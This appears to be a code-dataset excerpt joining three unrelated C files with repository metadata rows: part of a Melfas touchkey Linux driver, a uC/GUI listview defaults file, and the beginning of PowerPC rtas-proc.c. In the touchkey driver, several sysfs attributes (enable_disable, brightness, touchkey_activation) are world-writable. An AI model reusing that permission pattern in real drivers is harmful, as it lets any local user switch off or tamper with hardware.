touchkey_driver = kzalloc(sizeof(struct i2c_touchkey_driver), GFP_KERNEL);
if (touchkey_driver == NULL)
{
dev_err(dev, "failed to create our state\n");
return -ENOMEM;
}
touchkey_driver->client = client;
touchkey_driver->client->irq = IRQ_TOUCH_INT;
strlcpy(touchkey_driver->client->name, "melfas-touchkey", I2C_NAME_SIZE);
input_dev = input_allocate_device();
if (!input_dev)
return -ENOMEM;
touchkey_driver->input_dev = input_dev;
input_dev->name = DEVICE_NAME;
input_dev->phys = "melfas-touchkey/input0";
input_dev->id.bustype = BUS_HOST;
set_bit(EV_SYN, input_dev->evbit);
set_bit(EV_KEY, input_dev->evbit);
set_bit(touchkey_keycode[1], input_dev->keybit);
set_bit(touchkey_keycode[2], input_dev->keybit);
err = input_register_device(input_dev);
if (err)
{
input_free_device(input_dev);
return err;
}
gpio_pend_mask_mem = ioremap(INT_PEND_BASE, 0x10);
touchkey_wq = create_singlethread_workqueue("melfas_touchkey_wq");
if (!touchkey_wq)
return -ENOMEM;
INIT_WORK(&touchkey_driver->work, touchkey_work_func);
#ifdef CONFIG_HAS_EARLYSUSPEND
touchkey_driver->early_suspend.suspend = melfas_touchkey_early_suspend;
touchkey_driver->early_suspend.resume = melfas_touchkey_early_resume;
register_early_suspend(&touchkey_driver->early_suspend);
#endif /* CONFIG_HAS_EARLYSUSPEND */
if (request_irq(IRQ_TOUCH_INT, touchkey_interrupt, IRQF_DISABLED, DEVICE_NAME, touchkey_driver))
{
printk(KERN_ERR "%s Can't allocate irq ..\n", __FUNCTION__);
return -EBUSY;
}
return 0;
}
static void init_hw(void)
{
gpio_direction_output(_3_GPIO_TOUCH_EN, 1);
msleep(100);
s3c_gpio_setpull(_3_GPIO_TOUCH_INT, S3C_GPIO_PULL_NONE);
s3c_gpio_cfgpin(S5PV210_GPJ4(1), S3C_GPIO_SFN(0xf));
set_irq_type(IRQ_TOUCH_INT, IRQ_TYPE_EDGE_FALLING);
}
int touchkey_update_open (struct inode *inode, struct file *filp)
{
return 0;
}
ssize_t touchkey_update_read(struct file *filp, char *buf, size_t count, loff_t *f_pos)
{
return 0;
}
ssize_t touchkey_update_write (struct file *filp, const char *buf, size_t count, loff_t *f_pos)
{
return count;
}
int touchkey_update_release (struct inode *inode, struct file *filp)
{
return 0;
}
static ssize_t touchkey_activation_store(struct device *dev,
struct device_attribute *attr, const char *buf, size_t size)
{
printk(TCHKEY_KERN_DEBUG "called %s\n",__func__);
sscanf(buf, "%d", &activation_onoff);
printk(TCHKEY_KERN_DEBUG "deactivation test = %d\n",activation_onoff);
return size;
}
static ssize_t touchkey_version_show(struct device *dev,
struct device_attribute *attr, char *buf)
{
printk(TCHKEY_KERN_DEBUG "called %s \n",__func__);
return sprintf(buf,"%02x\n",version_info[1]);
}
static ssize_t touchkey_recommend_show(struct device *dev,
struct device_attribute *attr, char *buf)
{
u8 recommended_ver;
printk(TCHKEY_KERN_DEBUG "called %s \n",__func__);
if(version_info[2]==MCS5000_CHIP)
{
recommended_ver = MCS5000_last_ver;
}
else if(version_info[2]==MCS5080_CHIP)
{
recommended_ver = MCS5080_last_ver;
}
else
{
recommended_ver = version_info[1];
}
return sprintf(buf,"%02x\n",recommended_ver);
}
static ssize_t touchkey_firmup_show(struct device *dev,
struct device_attribute *attr, char *buf)
{
printk(TCHKEY_KERN_DEBUG "Touchkey firm-up start!\n");
if(version_info[2]==MCS5000_CHIP)
mcsdl_download_binary_data(MCS5000_CHIP);
else if(version_info[2]==MCS5080_CHIP)
mcsdl_download_binary_data(MCS5080_CHIP);
else
printk(KERN_ERR "Touchkey IC module is old, can't update!");
get_touchkey_data(version_info, 3);
printk(TCHKEY_KERN_DEBUG "Updated F/W version: 0x%x, Module version:0x%x\n", version_info[1], version_info[2]);
return sprintf(buf,"%02x\n",version_info[1]);
}
static ssize_t touchkey_init_show(struct device *dev,
struct device_attribute *attr, char *buf)
{
printk(TCHKEY_KERN_DEBUG "called %s \n",__func__);
return sprintf(buf,"%d\n",touchkey_dead);
}
static ssize_t touchkey_menu_show(struct device *dev,
struct device_attribute *attr, char *buf)
{
printk(TCHKEY_KERN_DEBUG "called %s \n",__func__);
return sprintf(buf,"%d\n",menu_sensitivity);
}
static ssize_t touchkey_back_show(struct device *dev,
struct device_attribute *attr, char *buf)
{
printk(TCHKEY_KERN_DEBUG "called %s \n",__func__);
return sprintf(buf,"%d\n",back_sensitivity);
}
static ssize_t touch_led_control(struct device *dev, struct device_attribute *attr, const char *buf, size_t size)
{
u8 data;
if(user_press_on)
return size;
sscanf(buf, "%d", &data);
i2c_touchkey_write(&data, 1); // LED on(data=1) or off(data=2)
return size;
}
static ssize_t touchkey_enable_disable(struct device *dev, struct device_attribute *attr, const char *buf, size_t size)
{
// this function is called when platform shutdown thread begins
printk(TCHKEY_KERN_DEBUG "called %s %c \n",__func__, *buf);
if(*buf == '0')
{
is_suspending = 1;
disable_irq(IRQ_TOUCH_INT);
gpio_direction_output(_3_GPIO_TOUCH_EN, 0);
}
else
{
printk(KERN_ERR "%s: unknown command %c \n",__func__, *buf);
}
return size;
}
struct file_operations touchkey_update_fops =
{
.owner = THIS_MODULE,
.read = touchkey_update_read,
.write = touchkey_update_write,
.open = touchkey_update_open,
.release = touchkey_update_release,
};
static struct miscdevice touchkey_update_device = {
.minor = MISC_DYNAMIC_MINOR,
.name = "melfas_touchkey",
.fops = &touchkey_update_fops,
};
static DEVICE_ATTR(touchkey_activation, S_IRUGO | S_IWUGO, NULL, touchkey_activation_store);
static DEVICE_ATTR(touchkey_version, S_IRUGO, touchkey_version_show, NULL);
static DEVICE_ATTR(touchkey_recommend, S_IRUGO, touchkey_recommend_show, NULL);
static DEVICE_ATTR(touchkey_firmup, S_IRUGO, touchkey_firmup_show, NULL);
static DEVICE_ATTR(touchkey_init, S_IRUGO, touchkey_init_show, NULL);
static DEVICE_ATTR(touchkey_menu, S_IRUGO, touchkey_menu_show, NULL);
static DEVICE_ATTR(touchkey_back, S_IRUGO, touchkey_back_show, NULL);
static DEVICE_ATTR(brightness, S_IRUGO | S_IWUGO, NULL, touch_led_control);
static DEVICE_ATTR(enable_disable, S_IRUGO | S_IWUGO, NULL, touchkey_enable_disable);
static int __init touchkey_init(void)
{
int ret = 0;
u8 updated = 0;
if (ret = gpio_request(_3_GPIO_TOUCH_EN, "_3_GPIO_TOUCH_EN"))
printk(KERN_ERR "Failed to request gpio %s:%d\n", __func__, __LINE__);
if (ret = gpio_request(_3_GPIO_TOUCH_INT, "_3_GPIO_TOUCH_INT"))
printk(KERN_ERR "Failed to request gpio %s:%d\n", __func__, __LINE__);
ret = misc_register(&touchkey_update_device);
if (ret) {
printk(KERN_ERR "%s misc_register fail\n",__FUNCTION__);
}
if (device_create_file(touchkey_update_device.this_device, &dev_attr_touchkey_activation) < 0)
{
printk(KERN_ERR "%s device_create_file fail dev_attr_touchkey_activation\n",__FUNCTION__);
pr_err("Failed to create device file(%s)!\n", dev_attr_touchkey_activation.attr.name);
}
if (device_create_file(touchkey_update_device.this_device, &dev_attr_touchkey_version) < 0)
{
printk(KERN_ERR "%s device_create_file fail dev_attr_touchkey_version\n",__FUNCTION__);
pr_err("Failed to create device file(%s)!\n", dev_attr_touchkey_version.attr.name);
}
if (device_create_file(touchkey_update_device.this_device, &dev_attr_touchkey_recommend) < 0)
{
printk(KERN_ERR "%s device_create_file fail dev_attr_touchkey_recommend\n",__FUNCTION__);
pr_err("Failed to create device file(%s)!\n", dev_attr_touchkey_recommend.attr.name);
}
if (device_create_file(touchkey_update_device.this_device, &dev_attr_touchkey_firmup) < 0)
{
printk(KERN_ERR "%s device_create_file fail dev_attr_touchkey_firmup\n",__FUNCTION__);
pr_err("Failed to create device file(%s)!\n", dev_attr_touchkey_firmup.attr.name);
}
if (device_create_file(touchkey_update_device.this_device, &dev_attr_touchkey_init) < 0)
{
printk(KERN_ERR "%s device_create_file fail dev_attr_touchkey_init\n",__FUNCTION__);
pr_err("Failed to create device file(%s)!\n", dev_attr_touchkey_init.attr.name);
}
if (device_create_file(touchkey_update_device.this_device, &dev_attr_touchkey_menu) < 0)
{
printk(KERN_ERR "%s device_create_file fail dev_attr_touchkey_menu\n",__FUNCTION__);
pr_err("Failed to create device file(%s)!\n", dev_attr_touchkey_menu.attr.name);
}
if (device_create_file(touchkey_update_device.this_device, &dev_attr_touchkey_back) < 0)
{
printk(KERN_ERR "%s device_create_file fail dev_attr_touchkey_back\n",__FUNCTION__);
pr_err("Failed to create device file(%s)!\n", dev_attr_touchkey_back.attr.name);
}
if (device_create_file(touchkey_update_device.this_device, &dev_attr_brightness) < 0)
{
printk(KERN_ERR "%s device_create_file fail dev_attr_brightness\n",__FUNCTION__);
pr_err("Failed to create device file(%s)!\n", dev_attr_brightness.attr.name);
}
if (device_create_file(touchkey_update_device.this_device, &dev_attr_enable_disable) < 0)
{
printk(KERN_ERR "%s device_create_file fail dev_attr_touch_update\n",__FUNCTION__);
pr_err("Failed to create device file(%s)!\n", dev_attr_enable_disable.attr.name);
}
init_hw();
get_touchkey_data(version_info, 3);
printk(TCHKEY_KERN_DEBUG "%s F/W version: 0x%x, Module version:0x%x\n",__FUNCTION__, version_info[1], version_info[2]);
//------------------- Auto Firmware Update Routine Start -------------------//
if(HWREV>=8)
{
if(version_info[1]==0xff) //unknown firmware state
{
if(!mcsdl_download_binary_data(MCS5000_CHIP)) //try MCS-5000 download
mcsdl_download_binary_data(MCS5080_CHIP); // if first try is fail, MCS-5080 download
updated = 1;
}
else
{
if(version_info[2]>=MCS5000_CHIP) //MCS-5000
{
if(version_info[1]!=MCS5000_last_ver) //not latest version
{
mcsdl_download_binary_data(MCS5000_CHIP);
updated = 1;
}
}
else if(version_info[2]==MCS5080_CHIP)//MCS-5080
{
if(version_info[1]!=MCS5080_last_ver) //not latest version
{
mcsdl_download_binary_data(MCS5080_CHIP);
updated = 1;
}
}
else
printk("Touchkey IC module is old, can't update!");
}
if(updated)
{
get_touchkey_data(version_info, 3);
printk(TCHKEY_KERN_DEBUG "Updated F/W version: 0x%x, Module version:0x%x\n", version_info[1], version_info[2]);
}
}
//------------------- Auto Firmware Update Routine End -------------------//
ret = i2c_add_driver(&touchkey_i2c_driver);
if(ret||(touchkey_driver==NULL))
{
touchkey_dead = 1;
printk(KERN_ERR "melfas touch keypad registration failed, module not inserted.ret= %d\n",ret);
}
return ret;
}
static void __exit touchkey_exit(void)
{
i2c_del_driver(&touchkey_i2c_driver);
misc_deregister(&touchkey_update_device);
if (touchkey_wq)
destroy_workqueue(touchkey_wq);
gpio_free(_3_GPIO_TOUCH_INT);
}
late_initcall(touchkey_init);
module_exit(touchkey_exit);
MODULE_LICENSE("GPL");
MODULE_AUTHOR("@@@");
MODULE_DESCRIPTION("melfas touch keypad");
| gpl-2.0 |
weiqiangdragonite/blog_tmp | unix_linux/arm_asm/uCGUI/OK6410/src/uCGUI/GUI/Widget/LISTVIEW_Default.c | 2 | 2831 | /*
*********************************************************************************************************
* uC/GUI
* Universal graphic software for embedded applications
*
* (c) Copyright 2002, Micrium Inc., Weston, FL
* (c) Copyright 2002, SEGGER Microcontroller Systeme GmbH
*
* µC/GUI is protected by international copyright laws. Knowledge of the
* source code may not be used to write a similar product. This file may
* only be used in accordance with a license and should not be redistributed
* in any way. We appreciate your understanding and fairness.
*
----------------------------------------------------------------------
File : LISTVIEW_Default.c
Purpose : Implementation of listview widget
---------------------------END-OF-HEADER------------------------------
*/
#include "LISTVIEW_Private.h"
#if GUI_WINSUPPORT
/*********************************************************************
*
* Exported routines: Various methods
*
**********************************************************************
*/
/*********************************************************************
*
* LISTVIEW_SetDefaultFont
*/
const GUI_FONT GUI_UNI_PTR * LISTVIEW_SetDefaultFont(const GUI_FONT GUI_UNI_PTR * pFont) {
const GUI_FONT GUI_UNI_PTR * pOldFont = LISTVIEW_DefaultProps.pFont;
LISTVIEW_DefaultProps.pFont = pFont;
return pOldFont;
}
/*********************************************************************
*
* LISTVIEW_SetDefaultTextColor
*/
GUI_COLOR LISTVIEW_SetDefaultTextColor(unsigned Index, GUI_COLOR Color) {
GUI_COLOR OldColor = 0;
if (Index < GUI_COUNTOF(LISTVIEW_DefaultProps.aTextColor)) {
OldColor = LISTVIEW_DefaultProps.aTextColor[Index];
LISTVIEW_DefaultProps.aTextColor[Index] = Color;
}
return OldColor;
}
/*********************************************************************
*
* LISTVIEW_SetDefaultBkColor
*/
GUI_COLOR LISTVIEW_SetDefaultBkColor(unsigned Index, GUI_COLOR Color) {
GUI_COLOR OldColor = 0;
if (Index < GUI_COUNTOF(LISTVIEW_DefaultProps.aBkColor)) {
OldColor = LISTVIEW_DefaultProps.aBkColor[Index];
LISTVIEW_DefaultProps.aBkColor[Index] = Color;
}
return OldColor;
}
/*********************************************************************
*
* LISTVIEW_SetDefaultGridColor
*/
GUI_COLOR LISTVIEW_SetDefaultGridColor(GUI_COLOR Color) {
GUI_COLOR OldColor = LISTVIEW_DefaultProps.GridColor;
LISTVIEW_DefaultProps.GridColor = Color;
return OldColor;
}
#else /* Avoid problems with empty object modules */
void LISTVIEW_Default_C(void) {}
#endif
/*************************** End of file ****************************/
| gpl-2.0 |
jeffegg/beaglebone | arch/powerpc/kernel/rtas-proc.c | 2 | 23239 | /*
* Copyright (C) 2000 Tilmann Bitterberg
* (tilmann@bitterberg.de)
*
* RTAS (Runtime Abstraction Services) stuff
* Intention is to provide a clean user interface
* to use the RTAS.
*
* TODO:
* Split off a header file and maybe move it to a different
* location. Write Documentation on what the /proc/rtas/ entries
* actually do.
*/
#include <linux/errno.h>
#include <linux/sched.h>
#include <linux/proc_fs.h>
#include <linux/stat.h>
#include <linux/ctype.h>
#include <linux/time.h>
#include <linux/string.h>
#include <linux/init.h>
#include <linux/seq_file.h>
#include <linux/bitops.h>
#include <linux/rtc.h>
#include <asm/uaccess.h>
#include <asm/processor.h>
#include <asm/io.h>
#include <asm/prom.h>
#include <asm/rtas.h>
#include <asm/machdep.h> /* for ppc_md */
#include <asm/time.h>
/* Token for Sensors */
#define KEY_SWITCH 0x0001
#define ENCLOSURE_SWITCH 0x0002
#define THERMAL_SENSOR 0x0003
#define LID_STATUS 0x0004
#define POWER_SOURCE 0x0005
#define BATTERY_VOLTAGE 0x0006
#define BATTERY_REMAINING 0x0007
#define BATTERY_PERCENTAGE 0x0008
#define EPOW_SENSOR 0x0009
#define BATTERY_CYCLESTATE 0x000a
#define BATTERY_CHARGING 0x000b
/* IBM specific sensors */
#define IBM_SURVEILLANCE 0x2328 /* 9000 */
#define IBM_FANRPM 0x2329 /* 9001 */
#define IBM_VOLTAGE 0x232a /* 9002 */
#define IBM_DRCONNECTOR 0x232b /* 9003 */
#define IBM_POWERSUPPLY 0x232c /* 9004 */
/* Status return values */
#define SENSOR_CRITICAL_HIGH 13
#define SENSOR_WARNING_HIGH 12
#define SENSOR_NORMAL 11
#define SENSOR_WARNING_LOW 10
#define SENSOR_CRITICAL_LOW 9
#define SENSOR_SUCCESS 0
#define SENSOR_HW_ERROR -1
#define SENSOR_BUSY -2
#define SENSOR_NOT_EXIST -3
#define SENSOR_DR_ENTITY -9000
/* Location Codes */
#define LOC_SCSI_DEV_ADDR 'A'
#define LOC_SCSI_DEV_LOC 'B'
#define LOC_CPU 'C'
#define LOC_DISKETTE 'D'
#define LOC_ETHERNET 'E'
#define LOC_FAN 'F'
#define LOC_GRAPHICS 'G'
/* reserved / not used 'H' */
#define LOC_IO_ADAPTER 'I'
/* reserved / not used 'J' */
#define LOC_KEYBOARD 'K'
#define LOC_LCD 'L'
#define LOC_MEMORY 'M'
#define LOC_NV_MEMORY 'N'
#define LOC_MOUSE 'O'
#define LOC_PLANAR 'P'
#define LOC_OTHER_IO 'Q'
#define LOC_PARALLEL 'R'
#define LOC_SERIAL 'S'
#define LOC_DEAD_RING 'T'
#define LOC_RACKMOUNTED 'U' /* for _u_nit is rack mounted */
#define LOC_VOLTAGE 'V'
#define LOC_SWITCH_ADAPTER 'W'
#define LOC_OTHER 'X'
#define LOC_FIRMWARE 'Y'
#define LOC_SCSI 'Z'
/* Tokens for indicators */
#define TONE_FREQUENCY 0x0001 /* 0 - 1000 (HZ)*/
#define TONE_VOLUME 0x0002 /* 0 - 100 (%) */
#define SYSTEM_POWER_STATE 0x0003
#define WARNING_LIGHT 0x0004
#define DISK_ACTIVITY_LIGHT 0x0005
#define HEX_DISPLAY_UNIT 0x0006
#define BATTERY_WARNING_TIME 0x0007
#define CONDITION_CYCLE_REQUEST 0x0008
#define SURVEILLANCE_INDICATOR 0x2328 /* 9000 */
#define DR_ACTION 0x2329 /* 9001 */
#define DR_INDICATOR 0x232a /* 9002 */
/* 9003 - 9004: Vendor specific */
/* 9006 - 9999: Vendor specific */
/* other */
#define MAX_SENSORS 17 /* I only know of 17 sensors */
#define MAX_LINELENGTH 256
#define SENSOR_PREFIX "ibm,sensor-"
#define cel_to_fahr(x) ((x*9/5)+32)
/* Globals */
static struct rtas_sensors sensors;
static struct device_node *rtas_node = NULL;
static unsigned long power_on_time = 0; /* Save the time the user set */
static char progress_led[MAX_LINELENGTH];
static unsigned long rtas_tone_frequency = 1000;
static unsigned long rtas_tone_volume = 0;
/* ****************STRUCTS******************************************* */
struct individual_sensor {
unsigned int token;
unsigned int quant;
};
struct rtas_sensors {
struct individual_sensor sensor[MAX_SENSORS];
unsigned int quant;
};
/* ****************************************************************** */
/* Declarations */
static int ppc_rtas_sensors_show(struct seq_file *m, void *v);
static int ppc_rtas_clock_show(struct seq_file *m, void *v);
static ssize_t ppc_rtas_clock_write(struct file *file,
const char __user *buf, size_t count, loff_t *ppos);
static int ppc_rtas_progress_show(struct seq_file *m, void *v);
static ssize_t ppc_rtas_progress_write(struct file *file,
const char __user *buf, size_t count, loff_t *ppos);
static int ppc_rtas_poweron_show(struct seq_file *m, void *v);
static ssize_t ppc_rtas_poweron_write(struct file *file,
const char __user *buf, size_t count, loff_t *ppos);
static ssize_t ppc_rtas_tone_freq_write(struct file *file,
const char __user *buf, size_t count, loff_t *ppos);
static int ppc_rtas_tone_freq_show(struct seq_file *m, void *v);
static ssize_t ppc_rtas_tone_volume_write(struct file *file,
const char __user *buf, size_t count, loff_t *ppos);
static int ppc_rtas_tone_volume_show(struct seq_file *m, void *v);
static int ppc_rtas_rmo_buf_show(struct seq_file *m, void *v);
static int sensors_open(struct inode *inode, struct file *file)
{
return single_open(file, ppc_rtas_sensors_show, NULL);
}
static const struct file_operations ppc_rtas_sensors_operations = {
.open = sensors_open,
.read = seq_read,
.llseek = seq_lseek,
.release = single_release,
};
static int poweron_open(struct inode *inode, struct file *file)
{
return single_open(file, ppc_rtas_poweron_show, NULL);
}
static const struct file_operations ppc_rtas_poweron_operations = {
.open = poweron_open,
.read = seq_read,
.llseek = seq_lseek,
.write = ppc_rtas_poweron_write,
.release = single_release,
};
static int progress_open(struct inode *inode, struct file *file)
{
return single_open(file, ppc_rtas_progress_show, NULL);
}
static const struct file_operations ppc_rtas_progress_operations = {
.open = progress_open,
.read = seq_read,
.llseek = seq_lseek,
.write = ppc_rtas_progress_write,
.release = single_release,
};
static int clock_open(struct inode *inode, struct file *file)
{
return single_open(file, ppc_rtas_clock_show, NULL);
}
static const struct file_operations ppc_rtas_clock_operations = {
.open = clock_open,
.read = seq_read,
.llseek = seq_lseek,
.write = ppc_rtas_clock_write,
.release = single_release,
};
static int tone_freq_open(struct inode *inode, struct file *file)
{
return single_open(file, ppc_rtas_tone_freq_show, NULL);
}
static const struct file_operations ppc_rtas_tone_freq_operations = {
.open = tone_freq_open,
.read = seq_read,
.llseek = seq_lseek,
.write = ppc_rtas_tone_freq_write,
.release = single_release,
};
static int tone_volume_open(struct inode *inode, struct file *file)
{
return single_open(file, ppc_rtas_tone_volume_show, NULL);
}
static const struct file_operations ppc_rtas_tone_volume_operations = {
.open = tone_volume_open,
.read = seq_read,
.llseek = seq_lseek,
.write = ppc_rtas_tone_volume_write,
.release = single_release,
};
static int rmo_buf_open(struct inode *inode, struct file *file)
{
return single_open(file, ppc_rtas_rmo_buf_show, NULL);
}
static const struct file_operations ppc_rtas_rmo_buf_ops = {
.open = rmo_buf_open,
.read = seq_read,
.llseek = seq_lseek,
.release = single_release,
};
static int ppc_rtas_find_all_sensors(void);
static void ppc_rtas_process_sensor(struct seq_file *m,
struct individual_sensor *s, int state, int error, const char *loc);
static char *ppc_rtas_process_error(int error);
static void get_location_code(struct seq_file *m,
struct individual_sensor *s, const char *loc);
static void check_location_string(struct seq_file *m, const char *c);
static void check_location(struct seq_file *m, const char *c);
static int __init proc_rtas_init(void)
{
if (!machine_is(pseries))
return -ENODEV;
rtas_node = of_find_node_by_name(NULL, "rtas");
if (rtas_node == NULL)
return -ENODEV;
proc_create("powerpc/rtas/progress", S_IRUGO|S_IWUSR, NULL,
&ppc_rtas_progress_operations);
proc_create("powerpc/rtas/clock", S_IRUGO|S_IWUSR, NULL,
&ppc_rtas_clock_operations);
proc_create("powerpc/rtas/poweron", S_IWUSR|S_IRUGO, NULL,
&ppc_rtas_poweron_operations);
proc_create("powerpc/rtas/sensors", S_IRUGO, NULL,
&ppc_rtas_sensors_operations);
proc_create("powerpc/rtas/frequency", S_IWUSR|S_IRUGO, NULL,
&ppc_rtas_tone_freq_operations);
proc_create("powerpc/rtas/volume", S_IWUSR|S_IRUGO, NULL,
&ppc_rtas_tone_volume_operations);
proc_create("powerpc/rtas/rmo_buffer", S_IRUSR, NULL,
&ppc_rtas_rmo_buf_ops);
return 0;
}
__initcall(proc_rtas_init);
static int parse_number(const char __user *p, size_t count, unsigned long *val)
{
char buf[40];
char *end;
if (count > 39)
return -EINVAL;
if (copy_from_user(buf, p, count))
return -EFAULT;
buf[count] = 0;
*val = simple_strtoul(buf, &end, 10);
if (*end && *end != '\n')
return -EINVAL;
return 0;
}
/* ****************************************************************** */
/* POWER-ON-TIME */
/* ****************************************************************** */
static ssize_t ppc_rtas_poweron_write(struct file *file,
const char __user *buf, size_t count, loff_t *ppos)
{
struct rtc_time tm;
unsigned long nowtime;
int error = parse_number(buf, count, &nowtime);
if (error)
return error;
power_on_time = nowtime; /* save the time */
to_tm(nowtime, &tm);
error = rtas_call(rtas_token("set-time-for-power-on"), 7, 1, NULL,
tm.tm_year, tm.tm_mon, tm.tm_mday,
tm.tm_hour, tm.tm_min, tm.tm_sec, 0 /* nano */);
if (error)
printk(KERN_WARNING "error: setting poweron time returned: %s\n",
ppc_rtas_process_error(error));
return count;
}
/* ****************************************************************** */
static int ppc_rtas_poweron_show(struct seq_file *m, void *v)
{
if (power_on_time == 0)
seq_printf(m, "Power on time not set\n");
else
seq_printf(m, "%lu\n",power_on_time);
return 0;
}
/* ****************************************************************** */
/* PROGRESS */
/* ****************************************************************** */
static ssize_t ppc_rtas_progress_write(struct file *file,
const char __user *buf, size_t count, loff_t *ppos)
{
unsigned long hex;
if (count >= MAX_LINELENGTH)
count = MAX_LINELENGTH -1;
if (copy_from_user(progress_led, buf, count)) { /* save the string */
return -EFAULT;
}
progress_led[count] = 0;
/* Lets see if the user passed hexdigits */
hex = simple_strtoul(progress_led, NULL, 10);
rtas_progress ((char *)progress_led, hex);
return count;
/* clear the line */
/* rtas_progress(" ", 0xffff);*/
}
/* ****************************************************************** */
static int ppc_rtas_progress_show(struct seq_file *m, void *v)
{
if (progress_led[0])
seq_printf(m, "%s\n", progress_led);
return 0;
}
/* ****************************************************************** */
/* CLOCK */
/* ****************************************************************** */
static ssize_t ppc_rtas_clock_write(struct file *file,
const char __user *buf, size_t count, loff_t *ppos)
{
struct rtc_time tm;
unsigned long nowtime;
int error = parse_number(buf, count, &nowtime);
if (error)
return error;
to_tm(nowtime, &tm);
error = rtas_call(rtas_token("set-time-of-day"), 7, 1, NULL,
tm.tm_year, tm.tm_mon, tm.tm_mday,
tm.tm_hour, tm.tm_min, tm.tm_sec, 0);
if (error)
printk(KERN_WARNING "error: setting the clock returned: %s\n",
ppc_rtas_process_error(error));
return count;
}
/* ****************************************************************** */
static int ppc_rtas_clock_show(struct seq_file *m, void *v)
{
int ret[8];
int error = rtas_call(rtas_token("get-time-of-day"), 0, 8, ret);
if (error) {
printk(KERN_WARNING "error: reading the clock returned: %s\n",
ppc_rtas_process_error(error));
seq_printf(m, "0");
} else {
unsigned int year, mon, day, hour, min, sec;
year = ret[0]; mon = ret[1]; day = ret[2];
hour = ret[3]; min = ret[4]; sec = ret[5];
seq_printf(m, "%lu\n",
mktime(year, mon, day, hour, min, sec));
}
return 0;
}
/* ****************************************************************** */
/* SENSOR STUFF */
/* ****************************************************************** */
static int ppc_rtas_sensors_show(struct seq_file *m, void *v)
{
int i,j;
int state, error;
int get_sensor_state = rtas_token("get-sensor-state");
seq_printf(m, "RTAS (RunTime Abstraction Services) Sensor Information\n");
seq_printf(m, "Sensor\t\tValue\t\tCondition\tLocation\n");
seq_printf(m, "********************************************************\n");
if (ppc_rtas_find_all_sensors() != 0) {
seq_printf(m, "\nNo sensors are available\n");
return 0;
}
for (i=0; i<sensors.quant; i++) {
struct individual_sensor *p = &sensors.sensor[i];
char rstr[64];
const char *loc;
int llen, offs;
sprintf (rstr, SENSOR_PREFIX"%04d", p->token);
loc = of_get_property(rtas_node, rstr, &llen);
/* A sensor may have multiple instances */
for (j = 0, offs = 0; j <= p->quant; j++) {
error = rtas_call(get_sensor_state, 2, 2, &state,
p->token, j);
ppc_rtas_process_sensor(m, p, state, error, loc);
seq_putc(m, '\n');
if (loc) {
offs += strlen(loc) + 1;
loc += strlen(loc) + 1;
if (offs >= llen)
loc = NULL;
}
}
}
return 0;
}
/* ****************************************************************** */
static int ppc_rtas_find_all_sensors(void)
{
const unsigned int *utmp;
int len, i;
utmp = of_get_property(rtas_node, "rtas-sensors", &len);
if (utmp == NULL) {
printk (KERN_ERR "error: could not get rtas-sensors\n");
return 1;
}
sensors.quant = len / 8; /* int + int */
for (i=0; i<sensors.quant; i++) {
sensors.sensor[i].token = *utmp++;
sensors.sensor[i].quant = *utmp++;
}
return 0;
}
/* ****************************************************************** */
/*
* Builds a string of what rtas returned
*/
static char *ppc_rtas_process_error(int error)
{
switch (error) {
case SENSOR_CRITICAL_HIGH:
return "(critical high)";
case SENSOR_WARNING_HIGH:
return "(warning high)";
case SENSOR_NORMAL:
return "(normal)";
case SENSOR_WARNING_LOW:
return "(warning low)";
case SENSOR_CRITICAL_LOW:
return "(critical low)";
case SENSOR_SUCCESS:
return "(read ok)";
case SENSOR_HW_ERROR:
return "(hardware error)";
case SENSOR_BUSY:
return "(busy)";
case SENSOR_NOT_EXIST:
return "(non existent)";
case SENSOR_DR_ENTITY:
return "(dr entity removed)";
default:
return "(UNKNOWN)";
}
}
/* ****************************************************************** */
/*
* Builds a string out of what the sensor said
*/
static void ppc_rtas_process_sensor(struct seq_file *m,
struct individual_sensor *s, int state, int error, const char *loc)
{
/* Defined return vales */
const char * key_switch[] = { "Off\t", "Normal\t", "Secure\t",
"Maintenance" };
const char * enclosure_switch[] = { "Closed", "Open" };
const char * lid_status[] = { " ", "Open", "Closed" };
const char * power_source[] = { "AC\t", "Battery",
"AC & Battery" };
const char * battery_remaining[] = { "Very Low", "Low", "Mid", "High" };
const char * epow_sensor[] = {
"EPOW Reset", "Cooling warning", "Power warning",
"System shutdown", "System halt", "EPOW main enclosure",
"EPOW power off" };
const char * battery_cyclestate[] = { "None", "In progress",
"Requested" };
const char * battery_charging[] = { "Charging", "Discharching",
"No current flow" };
const char * ibm_drconnector[] = { "Empty", "Present", "Unusable",
"Exchange" };
int have_strings = 0;
int num_states = 0;
int temperature = 0;
int unknown = 0;
/* What kind of sensor do we have here? */
switch (s->token) {
case KEY_SWITCH:
seq_printf(m, "Key switch:\t");
num_states = sizeof(key_switch) / sizeof(char *);
if (state < num_states) {
seq_printf(m, "%s\t", key_switch[state]);
have_strings = 1;
}
break;
case ENCLOSURE_SWITCH:
seq_printf(m, "Enclosure switch:\t");
num_states = sizeof(enclosure_switch) / sizeof(char *);
if (state < num_states) {
seq_printf(m, "%s\t",
enclosure_switch[state]);
have_strings = 1;
}
break;
case THERMAL_SENSOR:
seq_printf(m, "Temp. (C/F):\t");
temperature = 1;
break;
case LID_STATUS:
seq_printf(m, "Lid status:\t");
num_states = sizeof(lid_status) / sizeof(char *);
if (state < num_states) {
seq_printf(m, "%s\t", lid_status[state]);
have_strings = 1;
}
break;
case POWER_SOURCE:
seq_printf(m, "Power source:\t");
num_states = sizeof(power_source) / sizeof(char *);
if (state < num_states) {
seq_printf(m, "%s\t",
power_source[state]);
have_strings = 1;
}
break;
case BATTERY_VOLTAGE:
seq_printf(m, "Battery voltage:\t");
break;
case BATTERY_REMAINING:
seq_printf(m, "Battery remaining:\t");
num_states = sizeof(battery_remaining) / sizeof(char *);
if (state < num_states)
{
seq_printf(m, "%s\t",
battery_remaining[state]);
have_strings = 1;
}
break;
case BATTERY_PERCENTAGE:
seq_printf(m, "Battery percentage:\t");
break;
case EPOW_SENSOR:
seq_printf(m, "EPOW Sensor:\t");
num_states = sizeof(epow_sensor) / sizeof(char *);
if (state < num_states) {
seq_printf(m, "%s\t", epow_sensor[state]);
have_strings = 1;
}
break;
case BATTERY_CYCLESTATE:
seq_printf(m, "Battery cyclestate:\t");
num_states = sizeof(battery_cyclestate) /
sizeof(char *);
if (state < num_states) {
seq_printf(m, "%s\t",
battery_cyclestate[state]);
have_strings = 1;
}
break;
case BATTERY_CHARGING:
seq_printf(m, "Battery Charging:\t");
num_states = sizeof(battery_charging) / sizeof(char *);
if (state < num_states) {
seq_printf(m, "%s\t",
battery_charging[state]);
have_strings = 1;
}
break;
case IBM_SURVEILLANCE:
seq_printf(m, "Surveillance:\t");
break;
case IBM_FANRPM:
